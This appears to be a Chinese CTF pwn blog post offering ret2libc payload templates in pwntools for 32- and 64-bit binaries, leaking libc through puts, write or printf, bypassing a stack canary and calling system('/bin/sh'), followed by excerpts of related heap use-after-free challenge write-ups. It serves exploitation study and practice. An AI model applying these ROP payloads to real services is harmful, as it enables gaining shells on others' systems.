libc泄漏
泄露libc之有libc文件
给fresh pwner提醒下,这里的puts是可以换的(看你是通过puts函数泄露的还是通过write函数泄露的,通过哪个写哪个)仔细观察有无 libc 文件的区别(发现没中小括号也是要区分的哦,可以自己试试)
1 | libc_base = puts_addr - libc.sym['puts'] |
泄露libc之无libc文件
1 | libc = LibcSearcher('puts',puts_addr) |
32位传参
32位传参的方式是通过栈来传参的,与构造的payload也是有关的,大致如下:(有时候也会变根据题目意思来)
1 | payload =填充的数据 +system +垃圾数据/main_addr +binsh |
64位传参
64位传参前六个参数是通过寄存器来传参的,分别位rdi,rsi,rdx,rcx,r8,r9,之后的参数是通过栈传递的,同样构造payload也有一套,但还是需要具体问题具体分析,大致如下:
1 | payload =填充的数据 + rdi +binsh +system |
32位泄露libc之puts
这里只写构造payload的大体模板,其他的都是通式做多了就知道了(填充的数据是可以变的啊,main_addr也就是你需要返回的地址)
第一次payload泄露libc
1 | payload =b'A'*(0x20 +4) +p32(elf.plt["puts"]) +p32(main_addr) +p32(elf.got['puts']) |
第二次payload获得shell
1 | payload =b'A'*(0x20 +4) +p32(ret_addr) +p32(sys_addr) +p32(0) +p32(bin_sh) |
64位泄露libc之puts
第一次payload泄露libc
1 | payload =b'A'*(0x20 +8) +p64(rdi_addr) +p64(elf.got['puts']) +p64(elf.plt["puts"]) +p64(main_addr) |
接收
1 | puts_add= u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00')) |
第二次payload得shell
1 | payload=b'A'*(0x20 +8) +p64(ret_addr) +p64(rdi_addr) +p64(bin_sh) +p64(sys_addr) |
32位泄露libc之write
第一次payload泄露libc
1 | payload =b'A'*(0x20 +4) +p32(elf.plt['write']) +p32(main_addr) +p32(1)+ p32(elf.got['write']) +p32(4) |
接收
1 | write=u32(p.recv(4)) |
第二次payload获得shell
1 | payload =b'A'*(0x20 +4) +p32(ret_addr) +p32(sys_addr) +p32(0) +p32(bin_sh) |
64位泄露libc之write
第一次payload泄露libc
1 | payload =b'A' * (0x20 +8) + p64(rdi_addr) +p64(1)+p64(pop_rsi_r15) +p64(elf.got['write']) +p64(0) +p64(elf.plt['write']) + p64(main_addr) |
第二次payload得shell
1 | payload =b' A' * (0x20 +8) +p64(rdi_addr) + p64(bin_sh) +p64(sys_addr) |
64位泄露libc之printf
printf在执行打印格式化字符串时,有产生一个参数,然后我们还需要一个寄存器,来存放我们got表里所要的真实地址
1 | b'a'*28 + p64(pop_rdi) + p64(f_srt) + p64(pop_rsi_r15) + p64(printf_got) + p64(0) + p64(prinf_plt) + p64(main_addr) |
这里P64(0)的意思就是给R15寄存器填充对应的参数,pop_r15对应参数0,由于我们不用r15,随便设置一下它,我是设置成了0。 最后加个main函数,是我们返回到main函数,让程序走一遍,以便我们可以写入接下来的payload去控制程序流。
Canary
第一次泄露libc
1 | payload =b'A'*(0X20 -8) +p64(canary) +p64(0) +p64(rdi_addr) +p64(got_addr) +p64(plt_addr) +p64(vuln) |
第二次获得shell
1 | payload =b'A'*(0x20 -8) + p64(canary) +p64(0) +p64(ret_addr) +p64(rdi_addr) +p64(bin_sh) |
相关推荐
2025-07-27
[BJDCTF 2020]YDSneedGirlfriend
经典的增删改查 add 函数中就很有看头了,先申请了一个固定 0x10 大小的 chunk,又在 chunk 的 data 段写入的 puts 函数地址,又在 chunk->data 段+0x8 后面写入了一个新 chunk,并且往新 chunk 的 data 段写入 her name free 函数中未置 0 存在 uaf show 函数中使用 chunk->data 作为函数调用输出chunk->data(我调用我自己输出我自己了属于是 程序有完整的后面函数 此时我们想法是在 show 中实现调用后面函数 此时我们如果申请两个 0x20(实际申请 0x30 大小的 chunk ,并且 free 掉后 在 fastbin 中 0x20:chunk1->chunk0、0x30:chunk1->chunk0 0x20 是 add 函数中在每一次调用时都会申请的一个 0x10 大小的 chunk 此时我们可以利用这一点 在 add 函数中申请一个 0x10 大小的 chunk,会把 fastbin 链表中两个 0x20 的 chunk 申请出...
2025-07-31
[HNCTF 2022 WEEK4]ezheap
经典的增删改查 我们先看 add 函数 重要的是这几行,先创建一个 0x20 大小的堆块(实际是 0x30)放入heaplist 数组中,类似于管理堆块的数组 v0 是 chuank0 data 段的地址,v0+0x10 中放入新 chunk 的 data 段地址,v0+0x20 存入 puts 函数的真实地址 后续又往 chunk0 和 chunk1 中读入数据 堆块的大致情况入下图 delet 函数 free 后置零没有 uaf 漏洞 edit 函数 重点在这边,修改的 size 大小是我们输入进去的,所以我们可以申请两个 chunk,修改 第一个 chunk 的时候把第二个 chunk 的内容也修改掉。 show 函数 heaplist[v1] + 0x20 的地方就是 puts 函数,这边的本意就是调用 puts 函数输出heaplist[v1]->data 段内容,heaplist[v1] + 0x10->data 和第二个 chunk 中 data 段的内容 目前我们的思路就很清楚了,我们可以先申请两个堆块,然后通过 edit 函数修改第一个堆...
2025-07-27
hgame_week1
misaki #00044e-WEEK1-WP1-签到1-TEST NC nc 链接即可 2-从这里开始的序章。 2-sieve ai直接跑出来 3-Hakuya Want A Girl Friend开头是压缩包pk格式,结尾是47 4e 50 89png图片格式 倒叙即可获取图片 png高度一把梭即可 4-counting petals 第一次输入不超过16,第二次循环数组输入可以输入到v7[17],超出合法范围,覆盖到v8,同时是%ld,同时覆盖了v8,v9,后续通过输出泄漏返回地址,canary 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869from pwn import * #引用pwntools库context(log_level='debug',arch='amd64',os='linux')min...
2025-07-27
[NISACTF 2022]UAF
正常的增删改查功能 add 中创建一个堆放入 page 在数组之中的,v1 作为计数变量,每添加一个都自增 show 函数中输入 0 时会调用 (*((void (__cdecl **)(char *))page + 1))(page); 程序是 32 位使用 page+1 = page 地址+4 page[4]=函数名 page[0]=参数 此时就是需要修改 page[0]=sh\x00\x00+system 地址 使用sh\x00\x00 是因为只能存入 4 字节/bin/sh\x00 超出 4 字节 但是在 edit 函数中我们无法直接去修改 page[0] 中的值 del 函数中 free 未置 0 但是 v1 这个计数单位也未置 0 此时我们可以用到堆中的机制 先创建一个 chunk1,再释放掉 chunk1,此时在申请一个 chunk2 chunk2 使用的还是 chunk1 的地址,因为申请一个比较小的堆块时会在 fastbin 中先进行查找有没有对应 size 的堆块,如果有那就申请出来 所以我...
2025-07-27
周报汇总
[2021 鹤城杯]littleoflibc+canary保护 做了很久终于弄懂了 使用ida打开后发现此处两个read都可以作为溢出点进行栈溢出,但是程序开启了canary保护,所以我们需要绕过canary保护进行栈溢出 v3为canary的值 大小为8个字节位 此时我们可以先编写第一段代码内容,用于获取泄漏的canary值 12345678910111213141516171819202122from pwn import * #引用pwntools库context(log_level='debug',arch='amd64')p=remote('node4.anna.nssctf.cn',28445)#配置nc连接:node4.anna.nssctf.cn:28445e=ELF('./littleof')put_got=e.got['puts']put_plt=e.plt['puts']ret=0x40059erdi=0x400863main_add=...
2025-08-19
CTFshow PWN160
libc 下载链接:https://files.buuoj.cn/files/85ee93d92fc553f78f195a133690eef3/libc-2.23.so 简单的增删改查 在 add 中,我们输入 size 创建的 chunk 为 s,固定生成的一个 chunk 为 v3 s 在 v3 内存的上方,后续将 s 的 data 段地址赋值给 v3data 段 将 v3 放入 chunk 管理数组 chunk_s 中 edit 函数中有验证 v3->s+v2 的值于 s 的 size 做比较,如果我们在 v3 和 s 之间添加 chunk 使其不连续即可绕过此检查 add 后的 chunk 如图所示 delete 函数中将 s 清空,未将 v3chunk 清空,存在 uaf,但是这题不用 uaf 也可以写 show 输出 s 和 v3 中的 nam 和 test edit 就是上面 add 中的修改 test 中使用的 目前我们的思路为: 使 s 和 v3 中有其他 chunk 存在,这样我们就可以绕过 edit 中的检测使其修改到别的 chunk 内...
评论
